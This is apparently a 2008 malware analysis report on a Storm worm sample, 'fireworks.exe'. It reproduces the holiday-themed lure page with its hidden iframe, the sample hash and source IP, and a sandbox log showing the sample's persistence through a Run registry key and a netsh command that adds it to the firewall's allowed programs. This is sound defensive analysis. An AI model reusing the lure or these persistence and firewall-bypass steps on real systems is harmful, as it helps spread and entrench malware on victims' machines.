HolisticInfoSec.org
July 3, 2008
Russ McRee
holisticinfosec at gmail.com

STORM SAMPLE: FIREWORKS.EXE

Sample source:
http://66.31.118.34/

Source web page:
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<title>Colorful Independence Day Fireworks</title>
</head>
<body bgcolor="#FFCCFF">
<center>
<table border=0 align=center width="405">
<tr><td><a href="fireworks.exe"><img border="0" src="fw.gif"></a></td></tr>
<tr><td>Colorful Independence Day events have already started throughout the country. The largest firework happens on the last weekday before the Fourth of July. Unprecedented sum of money was spent on this fabulous show. If you want to see the best Independence Day firework just click on the video and run it.</td></tr>
</table>
<iframe src="ind.php" width="1" height="1" style="visibility:hidden;position:absolute"></iframe>
</body>
</html>


Sample details:
File: fireworks.exe
MD5:  d7d350e34809adc4a56e592b58f9d4ad
Size: 118785

---------------------------------------------------------------------------

VirusTotal:
http://www.virustotal.com/analisis/a9d59c2e1f3393fa8f7373d32e327dea

---------------------------------------------------------------------------

Sandbox analysis

Files

New Files C:\WINDOWS\msserv.exe
C:\WINDOWS\msserv.config
 
Opened Files C:\WINDOWS\AppPatch\sysmain.sdb
C:\WINDOWS\AppPatch\systest.sdb
\Device\NamedPipe\ShimViewer
C:\WINDOWS\msserv.exe
C:\WINDOWS\AppPatch\sysmain.sdb
C:\WINDOWS\AppPatch\systest.sdb
\Device\NamedPipe\ShimViewer
C:\WINDOWS\system32\netsh.exe
C:\WINDOWS\system32\w32tm.exe
\\.\PIPE\lsarpc
C:\WINDOWS\Registration\R00000000000b.clb
\\.\PIPE\lsarpc
C:\WINDOWS\msserv.exe
 
Deleted Files  
Chronological Order Copy File: c:\malware\fireworks.exe to C:\WINDOWS\msserv.exe
Open File: C:\WINDOWS\AppPatch\sysmain.sdb (OPEN_EXISTING)
Open File: C:\WINDOWS\AppPatch\systest.sdb (OPEN_EXISTING)
Open File: \Device\NamedPipe\ShimViewer (OPEN_EXISTING)
Open File: C:\WINDOWS\msserv.exe ()
Find File: msserv.exe
Open File: C:\WINDOWS\AppPatch\sysmain.sdb (OPEN_EXISTING)
Open File: C:\WINDOWS\AppPatch\systest.sdb (OPEN_EXISTING)
Open File: \Device\NamedPipe\ShimViewer (OPEN_EXISTING)
Open File: C:\WINDOWS\system32\netsh.exe ()
Find File: netsh.exe
Open File: C:\WINDOWS\system32\w32tm.exe ()
Find File: w32tm.exe
Get File Attributes: C:\WINDOWS\msserv.config Flags: (SECURITY_ANONYMOUS)
Create File: C:\WINDOWS\msserv.config
Open File: \\.\PIPE\lsarpc (OPEN_EXISTING)
Get File Attributes: C:\WINDOWS\Registration Flags: (SECURITY_ANONYMOUS)
Open File: C:\WINDOWS\Registration\R00000000000b.clb (OPEN_EXISTING)
Get File Attributes: C:\WINDOWS\system32\WBEM\Logs\ Flags: (SECURITY_ANONYMOUS)
Open File: \\.\PIPE\lsarpc (OPEN_EXISTING)
Open File: C:\WINDOWS\msserv.exe (OPEN_EXISTING)

Registry

Changes HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run "" = C:\WINDOWS\msserv.exe
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List "" = C:\WINDOWS\msserv.exe:*:Enabled:enable
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\W32Time\Parameters "" = time.windows.com,time.nist.gov
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\W32Time\Parameters "" = NTP
 
Reads HKEY_LOCAL_MACHINE\SYSTEM\WPA\MediaCenter ""
HKEY_LOCAL_MACHINE\SYSTEM\WPA\MediaCenter ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Rpc\SecurityService ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\SystemShared ""
HKEY_CURRENT_USER\Keyboard Layout\Toggle ""
HKEY_CURRENT_USER\Keyboard Layout\Toggle ""
HKEY_CURRENT_USER\Keyboard Layout\Toggle ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Rpc\SecurityService ""
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List ""

Processes

Process Management Creates Process - Filename () CommandLine: (netsh firewall set allowedprogram "C:\WINDOWS\msserv.exe" enable) As User: () Creation Flags: ()
Creates Process - Filename () CommandLine: (w32tm /config /syncfromflags:manual /manualpeerlist:time.windows.com,time.nist.gov) As User: () Creation Flags: ()
Creates Process - Filename () CommandLine: (w32tm /config /update) As User: () Creation Flags: ()